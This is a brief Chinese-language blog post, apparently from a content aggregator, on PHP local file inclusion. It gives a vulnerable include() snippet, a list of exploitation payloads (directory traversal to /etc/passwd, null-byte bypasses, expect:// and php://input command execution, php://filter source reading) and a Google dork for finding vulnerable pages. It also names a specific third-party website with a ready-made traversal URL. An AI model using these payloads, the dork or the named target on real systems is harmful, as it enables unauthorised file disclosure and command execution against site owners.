LFI (local file inclusion vulnerability)本地文件包含

Posted hack404

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了LFI (local file inclusion vulnerability)本地文件包含相关的知识,希望对你有一定的参考价值。

代码实例:

<?php

$file = $_GET[‘file‘];

if(isset($file))

include("pages/$file");

else

include("index.php");

?>

 

利用方式:

/script.php?page=../../../../../etc/passwd

php?page=expect://id

?page=/etc/passwd%00

?page=/etc/passwd%2500

warpper://target

?page=php://input&cmd=ls

page=php://filter/convert.base64-encode/resource=

 

google hacking

inurl:index.php?page=

 

vulnerable website:

http://confituredebali.com/index.php?page=../../../../../../../../etc/passwd

技术图片

以上是关于LFI (local file inclusion vulnerability)本地文件包含的主要内容,如果未能解决你的问题,请参考以下文章

vulhub-php/php_inclusion_getshell

LFI漏洞利用总结

Buuctf | BUU LFI COURSE 1

WeChall_Training: PHP LFI (Exploit, PHP, Training)

DVWA [File Inclusion]

DVWA —— File Inclusion分析